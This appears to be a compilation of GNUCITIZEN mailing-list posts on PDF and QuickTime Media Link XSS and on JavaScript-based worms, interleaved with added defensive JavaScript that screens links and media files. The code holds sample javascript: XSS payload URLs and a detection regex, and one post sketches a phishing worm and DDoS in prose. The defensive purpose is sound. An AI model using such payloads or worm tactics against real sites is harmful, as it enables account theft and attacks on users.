pdp (architect) | petko d. petkov
http://www.gnucitizen.org
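A defender-side screen for the "file.pdf#name=javascript:..." template from the "Universal XSS with PDF files" post above, and for the '#'-flooded fragment Stefano Di Paola describes here, written as an added example; it is not code from this thread or from any of the posters. It is meant for a site that lets users post links (a forum, a profile page): a link to a .pdf is flagged when the value part of its fragment, after loose percent-decoding, starts with a javascript: scheme, or when the fragment is made largely of '#' characters. The host names and sample links are constructed, and the 32-character '#' threshold is an assumption to tune locally.

```javascript
// Added example (not from the thread): screening user-supplied links for the
// "file.pdf#name=javascript:..." pattern and for '#'-flooded fragments.
// Host names below are constructed placeholders.

// A javascript: scheme, allowing the leading whitespace/control bytes browsers ignore.
const JS_SCHEME = /^[\s\x00-\x1f]*javascript\s*:/i;
// Assumed threshold for the "more '#'" case; tune to what your links legitimately carry.
const MAX_HASH_CHARS = 32;

function decodeLoose(s) {
  // A malformed escape must not let a value slip past the check undecoded.
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

function inspectPdfLink(href) {
  let url;
  try {
    url = new URL(href);
  } catch (e) {
    return { pdf: false, risky: true, reason: 'unparseable URL' };
  }
  if (!/\.pdf$/i.test(url.pathname)) {
    return { pdf: false, risky: false, reason: 'not a PDF link' };
  }
  const fragment = url.hash.startsWith('#') ? url.hash.slice(1) : url.hash;
  if (fragment === '') {
    return { pdf: true, risky: false, reason: 'no fragment' };
  }
  // The reader treats the fragment as name=value; only the value reaches its JS engine,
  // and (as Sven Vetsch noted) the name does not matter.
  const eq = fragment.indexOf('=');
  const value = decodeLoose(eq === -1 ? fragment : fragment.slice(eq + 1));
  if (JS_SCHEME.test(value)) {
    return { pdf: true, risky: true, reason: 'javascript: scheme in fragment value' };
  }
  const hashCount = (fragment.match(/#/g) || []).length;
  if (hashCount > MAX_HASH_CHARS) {
    return { pdf: true, risky: true, reason: 'fragment flooded with #' };
  }
  return { pdf: true, risky: false, reason: 'fragment looks benign' };
}

// Constructed sample links, the kind a site might receive in posts or comments.
const SAMPLE_LINKS = [
  'http://docs.example.invalid/guide.pdf#page=3',
  "http://docs.example.invalid/guide.pdf#something=javascript:alert('lol')",
  'http://docs.example.invalid/guide.pdf#x=%6Aavascript%3Aalert(1)',
  'http://docs.example.invalid/GUIDE.PDF#x=%20javascript:alert(1)',
  'http://docs.example.invalid/guide.pdf#' + '#'.repeat(40),
  'http://docs.example.invalid/index.html#x=javascript:alert(1)',
];

// Returns only the links a moderator or filter should hold back.
function riskyLinks(links) {
  return links.filter((l) => inspectPdfLink(l).risky);
}
```

The fragment never reaches the server in an HTTP request, so this kind of check has to run where the link text is visible: at submission time, on the stored markup, or in the client before the link is followed. It also cannot stop a visitor from typing such a URL by hand, which is why the thread's real fix is the reader update.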
[Full-disclosure] new backframe release
just for Christmas, there is a new backframe release:

http://www.gnucitizen.org/backframe/
http://www.gnucitizen.org/projects/backframe/

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
[Full-disclosure] New MySpace worm could be on its way
http://www.gnucitizen.org/blog/myspace-quicktime-worm-follow-up

MySpace was hit by a worm in a semi-automatic manner. This time the worm propagated via a QuickTime flaw found a couple of months ago. This shouldn't be a surprise to anyone. It is quite serious that this attack vector was picked up by Apple so late.

In this post I am not going to explain how this particular MySpace hack works but rather send a reminder to the security community that another QuickTime XSS vector (http://www.gnucitizen.org/blog/backdooring-mp3-files) was found right after the first one. This vector can be used in a similar way although, IMHO, the impact is greater. I guess Apple should fix both issues NOW: we don't want MySpace worms spreading around again, although this is very utopian to say.

Here is a brief reminder of what the XSS issue was all about. The problem is caused by a quite useful feature called QuickTime Media Link (.qtl). The whole point of these QuickTime Media Link files is to provide a means of playing media files in a more accessible way. In this respect the developer can create a .qtl file which holds information about the media content that needs to be played plus recommended dimensions, accessibility features, control features etc... .qtl files can contain malicious JavaScript code that can take over some important network device when executed, for example.

That's not the end of the story though. Because of its flexibility QuickTime doesn't mind if Media Link (.qtl) files end with .mp3, .mp4, .m4a or even .mov extension... This is a quite big problem, especially in default configurations of iTunes. The iTunes installation wizard installs the QuickTime player and QuickTime browser plugins and associates various media files with its components. If you open an mp3 file from the desktop it will be played in the iTunes player by default; however, if you open it from some website it will be played in the QuickTime player browser plugin. In this respect, users who are previewing mp3 and other media files from the Internet are vulnerable.

(GNUCITIZEN, Backdooring MP3 Files: http://www.gnucitizen.org/blog/backdooring-mp3-files)

To sum up, and put into context, attackers can use QuickTime Media Links to imitate popular media files and as such trick the user into opening malicious content that could lead to their (MySpace) account or their browser being compromised.

Let's look at the following hypothetical situation: Evil Hacker decides to take over MySpace in order to DoS google.com. He finds that MySpace allows users to supply links in their posts and comments. He spends some time researching the 1000 most popular MySpace members, where he will post links to media files titled orgy.mov or myconfession.mp3 or even prankster.avi. Once an unaware user clicks on the link, a phishing page is presented asking the current user to enter their MySpace details to see the private content. If the user is tricked, their credentials will be on their way to the collection point specifically designed for that operation, where another automatic process takes over their user account, installing the same malicious file or simply hijacking other media files by wrapping them up in QuickTime Media Links the same way it is described in the article mentioned above. The process repeats when another user falls into the trap. When enough accounts are compromised Evil Hacker will launch his/her DDoS against Google's AdSense server farm.

Before seeing more worms of this kind I suggest that we gather our intellectual power to find a fix or at least a workaround. I welcome you to join me at GNUCITIZEN's MySpace Worms Topic (http://www.gnucitizen.org/topics/myspace-worms) for further discussion. I can assure you that neither GNUCITIZEN nor I have anything to do with MySpace or any other related organization. The purpose of this symposium is to learn more about these types of worms and help other online applications and communities protect themselves. This is much better than just sitting in our comfy chairs and laughing at people's mistakes.

Many thanks.

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
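One workaround a site can apply on its own side, as an added example that is not part of the post above or of any GNUCITIZEN code: the post says QuickTime will happily treat a Media Link file as .mp3, .mp4, .m4a, .mov or .avi based on nothing but its name, so a site that hosts or relays user media should not trust the extension either. A Media Link file is an XML document (a fact the post does not state, but one this example relies on), while real audio and video containers start with well-known bytes, so comparing the claimed extension against the sniffed container catches a renamed .qtl before it is served. The file names below are the ones from the post's scenario, and the byte samples are constructed.

```javascript
// Added example (not from the post): reject uploads or served files whose leading bytes
// do not match the media container their extension claims, so an XML QuickTime Media
// Link cannot pass as .mp3/.mp4/.m4a/.mov/.avi. Sample bytes below are constructed.

function sniffMediaContainer(bytes) {
  const b = Buffer.isBuffer(bytes) ? bytes : Buffer.from(bytes);
  if (b.length < 12) return 'too-short';

  // Markup (a .qtl file is an XML document): skip a UTF-8 BOM and whitespace, look for '<'.
  let i = 0;
  if (b[0] === 0xef && b[1] === 0xbb && b[2] === 0xbf) i = 3;
  while (i < b.length && [0x20, 0x09, 0x0a, 0x0d].includes(b[i])) i++;
  if (b[i] === 0x3c) return 'markup';

  // MPEG audio: an ID3v2 tag, or a frame header whose first 11 bits are the sync word.
  if (b.toString('latin1', 0, 3) === 'ID3') return 'mp3';
  if (b[0] === 0xff && (b[1] & 0xe0) === 0xe0) return 'mp3';

  // AVI: a RIFF container whose form type is "AVI ".
  if (b.toString('latin1', 0, 4) === 'RIFF' && b.toString('latin1', 8, 12) === 'AVI ') return 'avi';

  // ISO base media / QuickTime: bytes 4..7 hold the type of the first atom.
  const atom = b.toString('latin1', 4, 8);
  if (atom === 'ftyp') return 'isobmff';
  if (['moov', 'mdat', 'free', 'wide', 'skip', 'pnot'].includes(atom)) return 'quicktime';
  return 'unknown';
}

// Which sniffed containers each allowed extension may legitimately carry.
const ALLOWED = {
  mp3: ['mp3'],
  mp4: ['isobmff'],
  m4a: ['isobmff'],
  mov: ['isobmff', 'quicktime'],
  avi: ['avi'],
};

function extensionMatchesContent(filename, bytes) {
  const ext = filename.toLowerCase().split('.').pop();
  if (!Object.prototype.hasOwnProperty.call(ALLOWED, ext)) return false; // not on the allow-list
  return ALLOWED[ext].includes(sniffMediaContainer(bytes));
}

// Constructed samples: a Media Link renamed to .mov and to .avi, an ID3-tagged mp3,
// a raw MPEG frame mp3, and an M4A header.
const QTL = Buffer.from(
  '<?xml version="1.0"?>\n' +
  '<?quicktime type="application/x-quicktime-media-link"?>\n' +
  '<embed src="http://media.example.invalid/clip.mov" />\n');
const SAMPLES = {
  'orgy.mov': QTL,
  'prankster.avi': QTL,
  'myconfession.mp3': Buffer.concat([Buffer.from('ID3'), Buffer.alloc(32)]),
  'raw.mp3': Buffer.concat([Buffer.from([0xff, 0xfb, 0x90, 0x00]), Buffer.alloc(32)]),
  'track.m4a': Buffer.concat([Buffer.from([0, 0, 0, 0x20]), Buffer.from('ftypM4A '), Buffer.alloc(24)]),
};

// Verdict per sample: true when the bytes match what the extension promises.
function checkSamples() {
  const out = {};
  for (const [name, bytes] of Object.entries(SAMPLES)) {
    out[name] = extensionMatchesContent(name, bytes);
  }
  return out;
}
```

This only protects files the site itself stores or proxies; a link to a renamed .qtl on a third-party host still reaches the plugin, which is the case the post asks Apple to fix. Combining the sniff with an extension allow-list also rejects .qtl outright, rather than waiting for it to appear under another name.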
[Full-disclosure] The state of JavaScript Hacking
will want to push down their Apollo technology to every single computer on this planet. And guess what, JavaScript has access to Apollo's runtime just like Firefox and Opera have access to Java via LiveConnect. If you develop applications with Apollo and you don't set the security model properly, the RSS feeds you are eating may start eating you.

Last but not least we have Microsoft with their XAML and WPF (Windows Presentation Foundation). I am sure that not that many people have heard of these technologies so let me explain what they are in brief. They are Microsoft's way to do RIA. The only thing is that they rely on .NET3, which makes them explicitly for Windows. I am not sure what the state of the MONO project is though. WPF will allow you to build Rich Internet Applications with XML, CSS and .NET. .NET supports many languages, one of which is JavaScript. Try to do some coding in ASP and you will see that it feels the same as browser JavaScript. This is JavaScript on the server, the browser and the desktop. It enables web worms and future high-end attackers to a degree hardly imaginable by anyone today.

So what will be the state of JavaScript hacking in the future? WEB technologies will spread all over our lives. Your fridge and mobile will be powered by Flash Lite and Java. Your desktop will be crowded with WPF games and Apollo goodies. Your website will run on AJAX, CSS and XHTML. Code once, destruct everywhere!

If you are still not convinced that this is not a joke I really don't know where to forward you to for more information. I guess you should wait until things start happening.

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org